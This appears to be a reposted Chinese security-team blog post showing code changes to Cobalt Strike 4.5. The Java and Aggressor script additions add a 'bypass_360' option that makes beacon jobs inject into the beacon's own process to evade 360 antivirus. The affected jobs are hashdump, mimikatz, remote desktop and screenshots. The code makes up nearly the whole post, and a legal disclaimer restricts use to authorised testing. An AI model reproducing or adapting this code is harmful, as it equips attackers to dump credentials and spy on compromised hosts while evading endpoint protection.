aggressor/bridges/BeaconBridge.java
Cortana.put(instance, "&beacon_bypass_360", this);
else if(name.equals("&beacon_bypass_360")) {bids = bids(stack);String format = BridgeUtilities.getString(stack, "");for(int i = 0; i < bids.length; ++i) {this.conn.call("beacons.bypass_360", CommonUtils.args(bids[i], format));this.conn.call("beacons.log_write", CommonUtils.args(BeaconOutput.bypass_360_out(bids[i], format)));}}
"bypass_360", "note", "process", "pid", "arch", "last" };
//新增 bypass_360else if (var11.is("bypass_360")) {if (var11.verify("Z")) {arg = var11.popString();this.master.bypass360Handle(arg);} else if (var11.isMissingArguments()) {this.master.bypass360Handle("true");}}
//新增 bypass_360else if (var8.is("bypass_360")) {if (var8.verify("Z")) {arg = var8.popString();this.master.bypass360Handle(arg);} else if (var8.isMissingArguments()) {this.master.bypass360Handle("true");}}
public void Desktop(boolean var1) {//修改增加360处理for(int i = 0; i < this.bids.length; ++i) {this.GoInteractive(this.bids[i]);BeaconEntry beaconEntry = DataUtils.getBeacon(this.data, this.bids[i]);//Desktop函数新增 Bypass360处理if (beaconEntry!=null) {if (beaconEntry.getBypass360()) {this.log_task(this.bids[i], "Bypass 360: Tasked desktop job inject to self process: " + beaconEntry.getPid());int pid = common.CommonUtils.toNumber(beaconEntry.getPid(), 0);(new beacon.jobs.DesktopJob(this)).inject(this.bids[i], pid, beaconEntry.arch(), var1);}else {(new DesktopJob(this)).spawn(this.bids[i], this.arch(this.bids[i]), var1);}}}}
public void Hashdump() {String[] bids = this.bids;int length = bids.length;//新增 getBypass360 处理功能for(int i = 0; i < length; ++i) {String var4 = bids[i];BeaconEntry beaconEntry = DataUtils.getBeacon(this.data, var4);String systemArch = beaconEntry.is64() ? "x64" : "x86";if (beaconEntry.getBypass360()) {if (systemArch.equals(beaconEntry.arch())) {this.log_task(var4, "Bypass 360: Tasked hashdump job inject to self process: " + beaconEntry.getPid());int pid = common.CommonUtils.toNumber(beaconEntry.getPid(), 0);(new beacon.jobs.HashdumpJob(this)).inject(var4, pid, beaconEntry.arch());} else {this.error(var4, "Bypass 360: Do not inject into a " + beaconEntry.arch() + " process when running on a " + systemArch + " system.");}} else {(new HashdumpJob(this)).spawn(var4, systemArch);}}}
public void MimikatzSmall(String var1, int var2, String var3) {boolean flag = var2 >= 0 && CommonUtils.contains("x86, x64", var3);String[] bids = this.bids;int length = bids.length;//新增的 bypass360 处理逻辑for(int i = 0; i < length; ++i) {String beacon = bids[i];BeaconEntry beaconEntry = DataUtils.getBeacon(this.data, beacon);if (beaconEntry != null) {String systemArch = beaconEntry.is64() ? "x64" : "x86";if (beaconEntry.getBypass360()) {if (systemArch.equals(beaconEntry.arch())) {this.log_task(beacon, "Bypass 360: Tasked mimikatzsmall job inject to self process: " + beaconEntry.getPid());int pid = CommonUtils.toNumber(beaconEntry.getPid(), 0);(new MimikatzJobSmall(this, var1)).inject(beacon, pid, systemArch);} else {this.error(beacon, "Bypass 360: Do not inject into a " + beaconEntry.arch() + " process when running on a " + systemArch + " system.");}}else if (flag) {if (systemArch.equals(var3)) {(new MimikatzJobSmall(this, var1)).inject(beacon, var2, var3);} else {this.error(beacon, "Do not inject into a " + var3 + " process when running on a " + systemArch + " system.");}}else {(new MimikatzJobSmall(this, var1)).spawn(beacon, systemArch);}}}}
public void Printscreen() {String[] bids = this.bids;int length = bids.length;//新增Printscreen代码处理逻辑for(int i = 0; i < length; ++i) {String bid = bids[i];BeaconEntry beaconEntry = DataUtils.getBeacon(this.data, bid);if (beaconEntry != null) {if (beaconEntry.getBypass360()) {this.log_task(bid, "Bypass 360: Tasked printscreen job inject to self process: " + beaconEntry.getPid());int pid = CommonUtils.toNumber(beaconEntry.getPid(), 0);ScreenshotJob.Printscreen(this).inject(bid, pid, beaconEntry.arch());}else{ScreenshotJob.Printscreen(this).spawn(bid, beaconEntry.arch());}}}}
public void Screenshot() {String[] bids = this.bids;int length = bids.length;for(int i = 0; i < length; ++i) {String bid = bids[i];BeaconEntry beaconEntry = DataUtils.getBeacon(this.data, bid);//Screenshot功能更 新增 bypass360处理if (beaconEntry != null) {if (beaconEntry.getBypass360()) {this.log_task(bid, "Bypass 360: Tasked screenshot job inject to self process: " + beaconEntry.getPid());int number = CommonUtils.toNumber(beaconEntry.getPid(), 0);ScreenshotJob.Screenshot(this).inject(bid, number, beaconEntry.arch());} else {ScreenshotJob.Screenshot(this).spawn(bid, beaconEntry.arch());}}}}
///新增 bypass360 处理函数public void bypass360Handle(String arg) {for(int i = 0; i < this.bids.length; ++i) {this.conn.call("beacons.bypass_360", CommonUtils.args(this.bids[i], arg));this.conn.call("beacons.log_write", CommonUtils.args(BeaconOutput.bypass_360_out(this.bids[i], arg)));}}
map.put("bypass_360", this.bypass_360 + "");
传递状态
case 14://新增 bypass_360return this.prefix("bypass_360");
case 14:CommonUtils.writeUTF8(var1, "[bypass_360] " + this.text);
CNA调用函数逻辑
//新增存入bypass_360键值对calls.put("beacons.bypass_360", this);
//新增 bypass360 函数处理else if (r.is("beacons.bypass_360", 2)) {this.bypass360Handle((String)r.arg(0), (String)r.arg(1));}//新增 bypass360 函数处理else if (r.is("beacons.bypass_360", 1)) {this.bypass360Handle((String)r.arg(0), "true");}
item "&Bypass360" {$bid = $1;$dialog = dialog("Bypass360", %(bool_flags => ""), &Bypass360);dialog_description($dialog, "Set the Beacon's Bypass360 ");drow_combobox($dialog, "bool_flags", "bool_flag:", @("true", "false"));dbutton_action($dialog, "Bypass360");dialog_show($dialog);}sub "Bypass360" {binput($bid, "bypass_360 $3['bool_flags']");beacon_bypass_360($bid, $3['bool_flags']);}}
在学习本文技术或工具使用前,请您务必审慎阅读、充分理解各条款内容。
1、本团队分享的任何类型技术、工具文章等文章仅面向合法授权的企业安全建设行为与个人学习行为,严禁任何组织或个人使用本团队技术或工具进行非法活动。
2、在使用本文相关工具及技术进行测试时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。如您仅需要测试技术或工具的可行性,建议请自行搭建靶机环境,请勿对非授权目标进行扫描。
3、如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。
4、本团队目前未发起任何对外公开培训项目和其他对外收费项目,严禁任何组织或个人使用本团队名义进行非法盈利。
5、本团队所有分享工具及技术文章,严禁不经过授权的公开分享。
如果发现上述禁止行为,我们将保留追究您法律责任的权利,并由您自身承担由禁止行为造成的任何后果。
END
如您有任何投稿、问题、建议、需求、合作、请后台留言NOVASEC公众号!
或添加NOVASEC-余生 以便于及时回复。
感谢大哥们的对NOVASEC的支持点赞和关注
加入我们与萌新一起成长吧!
本团队任何技术及文件仅用于学习分享,请勿用于任何违法活动,感谢大家的支持!!
原文始发于微信公众号(NOVASEC):CS4.5改造:补充inject self 代码
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论